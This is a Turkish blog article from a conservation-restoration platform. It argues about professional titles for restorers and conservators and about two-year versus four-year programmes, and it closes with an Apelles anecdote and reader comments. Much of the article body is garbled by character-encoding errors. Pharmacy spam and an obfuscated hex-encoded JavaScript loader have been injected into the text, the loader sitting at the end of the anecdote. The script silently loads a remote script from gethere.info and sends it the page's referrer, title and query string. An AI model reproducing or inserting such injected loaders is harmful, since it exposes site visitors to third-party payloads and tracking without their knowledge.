A�lk Soluk

Son zamanlarda bildiri kitaplarA� dA�AYA�nda bir sahada mesleki konularda daha rahat bir tarzla yazA� yazma isteAYi kendini iyiden iyiye hissettirmiAYken Eser Doktoru adA� ile oluAYturulan bu dinamik platforma davet edilmem sayesinde dA?AYA?ncelerimi, araAYtA�rma ve uygulama A�alA�AYmalarA�mA� meslektaAYlarA�mla paylaAYabileceAYim ortamA� bulmaktan dolayA� bA?yA?k mutluluk duydum. Bu vesileyle A�ncelikle Eser Doktoru paylaAYA�m platformunu kuran ve geliAYmesi iA�in bA?yA?k emek veren genA� kardeAYlerimi bu A�zverili giriAYimlerinden A�tA?rA? tebrik eder, yaAYamA�n temposu iA�inde soluklanma fA�rsatA� bulacaAYA�m yazarlA�k teklifleri iA�in de ayrA�ca teAYekkA?r ederim. Kamu personeli olmamA�n vermiAY olduAYu kurumsal kimlikle ve bir devlet memuruna tanA�nan sA�nA�rlar dA?hilinde kalarak ancak camiamA�zA�n her aA�A�dan daha iyi AYartlara kavuAYmasA� iA�in konuAYulmasA�, tartA�AYA�lmasA� ve yapA�lmasA� gerekenleri irdeleyerek bu sayfada yazA�lar yayA�nlamaya gayret gA�stereceAYim. Makale yazarlarA�nA�n okuyuculara bilgi verme, farkA�ndalA�k oluAYturma, yorum ve deAYerlendirme yapma gibi gA�revlerini yerine getirmek iA�in hazA�rlanan yazA�larA�n A�zgA?nlA?k ve A�zen prensibiyle ele alA�nmasA� gerektiAYini savunduAYumdan kA�AYemdeki makalelerin belki sA�k aralA�klarla deAYil ama belirli bir sA�rayA� takip eden yazA� dizisi AYeklinde sunulmasA�nA� daha olumlu bulmaktayA�m. Bu ilk yazA�m ile site takipA�ilerine merhaba derken pek A�ok kiAYinin duyduAYunda benim gibi AYaAYA�rdA�AYA�nA� dA?AYA?ndA?AYA?m Eser Doktoru adA�yla ilgili gA�rA?AYlerimi paylaAYarak baAYlamak istiyorum.

A�AYrencilik yA�llarA�nda a�?mezun olunca ne olacaksA�n?a�? sorusunu yA�nelten aile bA?yA?klerinin ya da camiamA�z dA�AYA�ndaki kiAYilerin yaptA�AYA�mA�z iAYi kolay anlamalarA�nA� saAYlamak amacA�yla uzun lafA�n kA�sasA� AYeklinde sA�ylediAYimiz a�?Tarihi Eser Doktorua�? tanA�mA�nA� kullanmayalA� hatta neredeyse duymayalA� A�ok uzun zaman olmuAYtu. Azu gA?nlerde kafalar mesleki tanA�mlamalarla A�ylesine karA�AYA�k ki, kimi kendisini restoratA�r, kimi konservatA�r, kimi restoratA�r-konservatA�r, kimi mimar restoratA�r, kimi restorasyon teknikeri, kimi eser korumacA�, kimi ise sadece korumacA� olarak tanA�tA�rken bu kadar kimlik karA�AYA�klA�AYA�nA�n arasA�nda a�?ben eser doktoruyuma�? diyerek arkeolojik kazA�ya ya da AYantiyeye giden bir arkadaAYA�mA�za ekibin nasA�l bakacaAYA�nA� gA�rA?r gibiyim. Yine de restoran ve konservatuar gibi yanlA�AY anlaAYA�lmalara yol aA�madan ne iAY yaptA�AYA�mA�z ile ilgili fikir vermesi aA�A�sA�ndan en kestirme yol olarak kullanA�labilecek bu tabiri mesleki tanA�mlamadan uzak tutmakta fayda var. Malumunuz A?lkemizde koruma-onarA�m alanA�nda eAYitim 2 ve 4 yA�llA�k okullar ile lisansA?stA? programlar bA?nyesinde verilmekte. Bu nedenle de mesleki tanA�mda karA�AYA�klA�AYa yol aA�an A�ok A�eAYitli bakA�AY aA�A�larA� oluAYmuAY durumda. BazA� bA�lA?mlerin A�AYrencilerine empoze ettikleri Eser Doktoru tanA�mA�nA�n bA�yle bir ortamda nerede deAYerlendirilip, kimlere sA�yleneceAYi yA�nA?nde derinlemesine dA?AYA?nA?ldA?AYA?nde tam bir karAYA�lA�AYA�nA� gA�rmek oldukA�a zor.

Konuyu biraz irdeleyecek olursak AYuan 2 yA�llA�k okullarA�n A�oAYunluAYuna yakA�nA�nda ilgili bA�lA?mler Mimari Restorasyon, bir kA�smA� ise Eser Koruma adA�nA� aldA�ysa da yakA�n zamana kadar baAYta YA�ldA�z, BaAYkent, Bergama, A�znik, YalvaA�, KA?tahya ve Edirne meslek yA?ksekokullarA�nA�n Restorasyon bA�lA?mlerinde okuyan arkadaAYlarA�mA�z restorasyon-konservasyon teknikeri olarak mezun oldular ve restoratA�r-konservatA�r unvanA�nA� kullandA�lar. KA?ltA?rel mirasA�n olduAYu sahalarda genel olarak mimari eser A�alA�AYtA�klarA�nda restoratA�r, kA?A�A?k buluntu A�alA�AYtA�klarA�nda ise konservatA�r kimlikleriyle A�n plana A�A�ktA�lar. Buraya kadar kimsenin bir itirazA� olamazdA�, A�A?nkA? mesleAYi restorasyon ve konservasyon uygulamasA� yapmak olmayan arkeolog, sanat tarihA�isi, kimyager ya da kimya mA?hendisi ve hatta vasA�fsA�z iAYA�i mA?dahalesindense eserlerin bu iAYin eAYitimini almA�AY kiAYilerce ele alA�nmasA�, olmasA� gereken bir durumdu ve doAYru ekipler iA�inde yer bulabildiler. Ancak bu ekiplerde her zaman kendilerinin A?stA?nde, restorasyon ve konservasyon uygulamalarA�ndan sorumlu tutulan AYantiye AYefi mimar, kazA� baAYkanA� arkeolog, mA?zeci ya da devletin tayin ettiAYi kontrolA�r veya kimya mA?hendisi direktifinde A�alA�AYtA�lar. Bu durumun istisnai A�rnekler haricinde genel olarak bA�yle devam ettiAYini sA�yleyebiliriz. Koruma-onarA�m disiplini ile iliAYkili bu ve benzeri A?st akA�l rolA?nA? A?stlenmiAY gA�revlilerle birlikte koruma politikasA� geliAYtirecek, bA?tA?ncA?l koruma yaklaAYA�mA�yla sorumluluAYu A?stlenecek ve ilgili bilim dallarA�yla aynA� masaya oturabilecek, imza ve yaptA�rA�m yetkisine sahip, Venedik TA?zA?AYA?a��nde de belirtildiAYi gibi A�alA�AYA�lan her iAYin yayA�nA�nA� hazA�rlayabilen koruma tabanlA� bir formasyona ihtiyaA� vardA�. MA?hendis-tekniker iliAYkisinde olduAYu gibi bu pozisyonda ihtiyacA� duyulan boAYluAYu A�stanbul A?niversitesia��nde lisans dA?zeyinde ilk defa kurulan TaAYA�nabilir KA?ltA?r VarlA�klarA�nA� Koruma ve OnarA�m BA�lA?mA? ve sonrasA�nda aA�A�lan KA?ltA?r VarlA�klarA�nA� Koruma ve OnarA�m BA�lA?mleri doldurabilirdi. Ancak gerekli altyapA�ya sahip olunmadA�AYA�ndan mezunlarA�n iki yA�llA�k bir bA�lA?mA? dA�rt yA�lda bitirdikleri izlenimiyle restoratA�r-konservatA�r unvanA� taAYA�malarA� sonucunda aynA� sahada aynA� iAYleri yapmalarA�yla ve hatta aynA� kadrolara atanA�yor olmalarA�yla hem iki yA�llA�k teknikerler hem de dA�rt yA�llA�k lisans eAYitimi alanlar bA?yA?k haksA�zlA�AYa uAYratA�ldA�. Hatta bu nedenle bugA?n A�eAYitli platformlarda birbirine kA?stA?rA?lmA?AY bir halde mA?nakaAYa ettiklerini A?zA?lerek izliyoruz. a�?DA�rt ikiden iyidira�? gibi yanA�ltA�cA� bir bakA�AY aA�A�sA� ile konuya bakA�ldA�AYA�nda bu iki eAYitim programA�nA�n birbiriyle baAYlantA�lA� ama odak ve faaliyet alanA� aA�A�sA�ndan baAYlA� baAYA�na bA�lA?mler olduklarA� ders mA?fredatlarA� gA�z ardA� edilerek unutuluyor demektir. UA�ak mA?hendisi uA�aAYA�n tasarlanmasA�, aerodinamik yapA�sA�nA�n dA?zeltilmesi gibi konularla ilgilenirken uA�ak teknisyeni bakA�m ve revizyon iAYlerine bakmakta olduAYundan birbirlerinin yerini almalarA� beklenmediAYinden a�?mA?hendis teknisyenden iyidira�? gibi bir karAYA�laAYtA�rma olamayacaAYA�ndan sadece iAYinde kA�tA? mA?hendis ya da iyi teknisyen AYeklinde spesifik tanA�mlamaya gidilebilmektedir.

Bizim tarafA�mA�zdan bakA�ldA�AYA�nda diplomada ve camiada lisans mezunlarA�nA�n a�?korumacA�a�?, lisansA?stA? mezunlarA�nA�n ise a�?koruma uzmanA�a�? olarak tanA�mlanmasA� yukarA�da sA�ralanan nedenlerden dolayA� pek A�ok aA�A�dan daha yararlA� olacaktA�. Bu tanA�mla korumacA�nA�n iAYi baAYlA� baAYA�na tarihi eser koruma olacaAYA�ndan bunu yaparken restorasyon ve konservasyondan yararlanabileceAYi gibi mevzuatlarA�n dA?zenlenmesi, eserlerin belge deAYerinin ve koruma gereAYinin vurgulanmasA�, kamuoyunun bilinA�lendirilmesi ve ilgili bilimlerle yeni yA�ntemlerin denenmesi gibi pek A�ok faaliyeti de yerine getirebilecek ortamA� bulabilecektir. Kendimde bir lisans mezunu konservatA�r olarak yA�llar iA�indeki A�eAYitli pratiklerden hareketle korumacA� tanA�mA�nA�n sektA�rA?n (tarihi eserler, anA�tlar, kazA�lar, mA?zeler, AYantiyeler vb.) her aA�A�dan ihtiyacA� olan ve lisans eAYitimine karAYA�lA�k gelen bir kimlik olduAYunu sA�yleyebilirim. Bu AYekilde ayA�rA�nca sorunlar yumaAYA�nA�n da yavaAYA�a A�A�zA?ldA?AYA? gA�rA?lecektir.

Devletteki tanA�mA� aA�A�sA�ndan bakacak olursak Personel Dairesi, tarihi eserlerin restorasyon ve konservasyon A�alA�AYmalarA�nA� yapabilecek eleman ihtiyacA�nA� A�nceden belirlendiAYi gibi restoratA�r kadrolarA�yla istihdam etmektedir. DoAYal olarak A�zlA?k haklarA�nA�n iki yA�llA�k mezunlar temel alA�narak belirlendiAYi restoratA�r kadrosuna 2010 yA�lA�nda doAYru kadro karAYA�lA�AYA� tanA�mlanmamA�AY olan a�?korumacA�larA�na�? A�aAYrA�lmasA�yla/atanmasA�yla bir karA�AYA�klA�k da burada yaAYandA� ve sonrasA�nda da devam etti (hatta konservatA�r kadrosu kaldA�rA�ldA�). HA?lihazA�rda restoratA�rlerle aynA� iAYi yapabilecekleri dA?AYA?nA?len korumacA�larA�n bu AYekilde (istemeden olsa gerek) potansiyelleri daraltA�lA�p A�zlA?k haklarA�, yetki ve hadleri bloke edilmiAY oldu. Had (sA�nA�r) kelimesini A�zellikle kullanmak istedim. KorumacA� kimliAYiyle sahip olunan had ile hareket edildiAYinde sizi restoratA�r olarak gA�rmek isteyen A�evrelerin (bu A�evreler restoratA�rA? de ayakkabA� tamircisi olarak gA�rmekte direnir maalesef) haddinizi aAYtA�AYA�nA�zA� dA?AYA?nmesine sebep olmaktadA�r ve bir haksA�zlA�kta burada kendini gA�stermektedir. Bu durum a�?korumacA�a�? kimliAYini benimseyememiAYler tarafA�ndan bile yaAYatA�ldA�AYA�ndan korumacA� sorumluluAYuyla hareket eden mezunlarA�n dA?AYman ilan edildiAYi vakalara bile AYahit olunmaktadA�r. AyrA�ca a�?ben korumacA�yA�m ve bu aA�mada bu kadar iAYA�i A�alA�AYmamalA�, alan trafiAYi kontrol edilmelia�?, ya da a�?bir sezonda bu kadar fazla eser A�A�karA�lmamalA�, konservasyon iA�in bu sA?reler yetersiza�?, a�?bu alana ziyaretA�i alA�nmamalA�a�? veya a�?vitrin AYartlarA�, A�sA�, A�AYA�k ve nem deAYerleri AYu AYekilde olmak zorundaa�? a�?koruma bilincini geliAYtirmeliyiz, mesleki bilgiyi yaymalA�yA�za�? gibi korumacA� refleksiyle sA�ylenen sA�zler restoratA�r kimliAYinizden dolayA� dikkate alA�nmadA�AYA�ndan yaptA�rA�cA� bir fonksiyonu da olmuyor ve karAYA�nA�zdakiyle gereksiz yere sorun yaAYamanA�za neden oluyor. SA�z konusu tarihi eser olunca restoratA�r-konservatA�rler de tabi ki korumacA� vizyonuyla hareket etmektedir ancak burada lisans eAYitiminin hakkA�nA� teslim ederek kadro karAYA�lA�klarA�nA�n en doAYru AYekilde tanA�mlanabilmesi iA�in korumacA�larA�n yA?kleniciliAYinde iAY birliAYi ile A�alA�AYmalarA�n ele alA�nmasA� daha yerinde olacaktA�r. BazA� arkeolojik kazA�larda bu modelin eAYitime hA?rmeten (abi,abla-kardeAY hukukuyla) oluAYtuAYunu gA�rA?yoruz. BA�yle olduAYu zaman nasA�l ki bir iAYletmede herkesin mA?hendis ya da teknisyen olmadA�AYA� gibi kazA�, mA?ze, AYantiye ya da bA�lge laboratuvarlarA�nda 2 ve 4 yA�llA�k bA�lA?m mezunlarA�nA�n sorumluluklarA� dA?hilinde adil oranlarda A�alA�AYtA�rA�lmasA� daha hakkaniyetli ve verimlilik aA�A�sA�ndan en ideali olacaktA�r. Buradaki mA?hendis tanA�mA�ndan korumacA�larA�n mA?hendislik gA�revini A?stlendiAYi anlaAYA�lmamalA�dA�r. Daha A�ncede belirtildiAYi gibi korumacA�lar; restoratA�r-konservatA�r ile kimya mA?hendisliAYi, arkeoloji veya mA?zecilik gibi ilgili disiplinler arasA�nda kA�prA? vazifesi de gA�rerek ortak A�alA�AYmalarla kA?ltA?rel mirasA�n korunmasA�nda etkin rol A?stlenebilecektir. Bu rolA? haddini aAYarak gA�steren restoratA�r tanA�mlA� korumacA�lar da daha fazla yA�pratA�lmayacaktA�r.

Lisans mezunlarA�na atfedilmesini gerekli gA�rdA?AYA?m korumacA� tanA�mA�nA�n Gazi A?niversitesi KA?ltA?r VarlA�klarA�nA� Koruma ve OnarA�m BA�lA?mA?a��nde benimsenen bir kimlik olarak A�AYrencilere verilmeye A�alA�AYA�ldA�AYA�nA� A�AYretim A?yelerinden Prof. Dr. SelA�uk AzENER ile bir sohbetimizde A�AYrenmiAYtim. Bunun bA�yle olmasA� gerektiAYi a�?aklA�n yolu birdira�? dercesine ortadayken restorasyon-konservasyon alanA�ndaki tA?m bA�lA?m baAYkanlA�klarA� ile birlikte meslek tanA�mlarA�nA�n doAYru belirlenmesi, eAYitim mA?fredatlarA�nA�n bu tanA�mlara gA�re yapA�landA�rA�lmasA� ve hatta devlette ve A�zel sektA�rde kadro karAYA�lA�klarA� olarak yerini almasA� iA�in nelerin yapA�labileceAYini tartA�AYabileceAYimiz bir A�alA�AYtayA�n hazA�rlA�klarA�na baAYlandA�. A�alA�AYtayA�n nerede ve ne zaman yapA�lacaAYA� ile ilgili bilgileri ilerleyen gA?nlerde bu kA�AYemden takip edebilirsiniz.

Bir haber de geA�tiAYimiz ekim ayA�nda gerA�ekleAYtirilen Seramik Eserler A�alA�AYtayA� ile ilgili paylaAYmak istiyorum. A�alA�AYtay bildiri kitabA�nA�n bir eksikle tA?m yazA�larA� yayA�na hazA�rlanmakta olup eylA?l ayA�nda basA�lmasA� planlanmaktadA�r. Bu sayede seramik eserler ile ilgili baAYucu kitabA� niteliAYinde bir yayA�nA�n camiamA�za kazandA�rA�lmasA�nda emek veren herkese A�ok teAYekkA?r ederim.

Peki bizim Eser Doktorua��na ne olacak derseniz AYunu sA�ylemek lazA�m. Eserler hasta, bizler de doktor isek hastalA�kla kim ilgilenecek? Eser doktorunu referans alA�rsak A�nlisans mezunlarA� eser doktoru, lisans mezunlarA� eser doktoru+pataloji uzmanA�, lisansA?stA? mezunlarA� (eser doktoru)+pataloji bilimci ya da malzeme bilimci dersek bA�A�ak sA�rtA� bu konuda daha fazla kafa yormayA�p tatlA�ya baAYlar ve iAYlerimize odaklanabilir miyiz? bilemiyorum, bir sA?re daha A?zerinde hep beraber dA?AYA?nmemiz gerekiyor sanA�rA�m. YorumlarA�nA�zla AYekillendirmeye A�alA�AYalA�m.

Bir sonraki makalede; A�nlA?k giymeden de konservatA�r olunabileceAYini a�?Yeni baAYlayanlar A�A�in Konservasyona�? baAYlA�klA� yazA�mda okuyabilirsiniz. SaAYlA�cakla kalA�n..

viagra for young men. KA�ssadan Hisse meds without a script.

Efesa��te Apel isimli bir ressam yaAYarmA�AY. BA?yA?k A�skendera��in resimlerini yapmakla AYA�hret bulan Apela��in en bA?yA?k A�zelliAYi yaptA�AYA� resimleri halka aA�masA� ve gizlendiAYi bir perdenin arkasA�ndan onlarA�n tenkitlerini dinleyip hoAYa gidecek yeni resimler iA�in fikir geliAYtirmesi imiAY.

GA?nlerden birinde bir ayakkabA� tamircisi Apela��in resimlerinden birini tepeden tA�rnaAYa sA?zA?p tenkide baAYlamA�AY. A�nce resimdeki A�izmeler A?zerinde gA�rA?AYlerini bildirip, kunduracA�lA�k aA�A�sA�ndan tenkitlerini sA�ralamA�AY. Apel bunlarA� dinleyip gerekli notlarA� almA�AY. Ancak bir mA?ddet sonra adam resmin A?st kA�sA�mlarA�nA� da eleAYtirmeye ve hatta teknik yA�nden, sanat aA�A�sA�ndan, renklerin kontrastA� ve gA�lgelerin derecesi A?zerine de ileri geri konuAYmaya baAYlayA�nca Apel perdenin arkasA�ndan baAYA�rmA�AY:

– Efendi, haddini bil; A�izmeden yukarA� A�A�kma..!var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}


Bir önceki yazımız olan Taş Konservasyonunda Kimyasalın Yeri başlıklı konumuz da İlyas TAŞDEMİR, Kimyasal ve Konservasyon hakkında bilgiler verilmektedir.

Makale Hakkında Yorum Yapın!

Makale Hakkında Yapılan Yorumlar

 enver derse 26 Mart 2015
1 0

Eserdokturuna sizin gibi değerli hocaları bizlerle buluşturduğu için teşekkür ederim.
hocam yazınızı büyük bir keyifle okudum. bölüm ve iş alanıyla ilgili sıkıntıları çok net bir şekilde dile getirmişsiniz. bu alanla ilgili olarak her ne kadar iş tecrübemiz yoksa da alanda çalışan arkadaşlardan tam da dile getirdiğiniz sıkıntıları duyuyoruz. duygularımıza ve sıkıntılarımıza tercüme olduğunuz için teşekkür ederiz hocam.
Eserdoktoruna hoşgeldiniz hocam

 Zozan 26 Mart 2015
0 0

Merhaba hocam eser doktoruna hoşgeldiniz bizim bölümün geçmişini ve bugün geldiği noktayı anlatan çok güzel bir yazı paylaşmişsiniz bu güzel yazı için teşekkürler bu yazıyı okurken şunu farkettim sanırım aynı yollardan geçiyoruz 🙂
Eser doktoruna da ayrıca teşekkür ediyorum sayesinde çok güzel makaleleri bir arada bulma şansımız oldu …

 Cengiz 27 Mart 2015
1 0

Hocam, mesleki anlamda yaşadığımız en büyük karmaşayı dile getirmişsiniz. 2 mi 4 mü tartışmasına ve ünvan karmaşasına nokta koyacak nitelikte bir yazı olmuş. Bunun için teşekkür ederim. Korumacı hocalarımız ve mesleki anlamda değerli hizmetleri olmuş restorasyon ve konservasyon camiasından ustalarımız olarak bu karmaşaya yasal anlamda son verilemez mi? Geçen seneki sözleşmeli personel alımında yanılmıyorsam “11” daldan başvuru oldu. “Restorasyon, mimari restorasyon, kültür varlıklarını koruma ve onarım, taşınabilir kültür varlıklarını koruma ve onarım, eser koruma, bina koruma ve yenileme, restorasyon-konservasyon, restorasyon ve konservasyon ve aklıma gelmeyen birkaç bölüm daha. Öğrenciler olarak biz de karmaşa halindeyiz. Ben hatayı en başta arıyorum. Yani okulları ve bölümleri yetersiz kadroyla açanlarda. İşsizlik politikasının birer parçası haline geldik. Okulunda yağlı boya tablo konservasyonunun uygulamalı eğitimini görmeyen öğrenci mesleğe başlayınca bu işi nasıl yapacak? Belki bu uç bir örnek oldu ama imkansız değil. Evet konservasyon ve restorasyon bilimi ülkemizde çok yeni bunun farkındayız ama yasal bir desteğimiz, eğitimde yeterliliğimiz, iş alanında geniş imkanlarımızın olması için neler yapmak gerekiyor?

Yorumlara kapalı.